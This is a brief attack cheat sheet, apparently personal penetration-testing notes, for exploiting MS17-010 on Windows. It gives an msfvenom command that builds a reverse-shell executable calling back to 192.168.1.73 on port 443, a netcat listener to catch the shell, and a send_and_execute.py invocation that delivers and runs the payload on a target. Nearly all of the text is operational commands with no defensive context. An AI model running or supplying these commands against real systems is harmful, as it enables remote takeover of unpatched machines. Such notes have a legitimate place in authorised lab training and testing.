MS17-010

//generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o reverse.exe
//put a listener
nc -nlvp 443
//launch the script 
python send_and_execute.py 192.168.1.*** reverse.exe

Last updated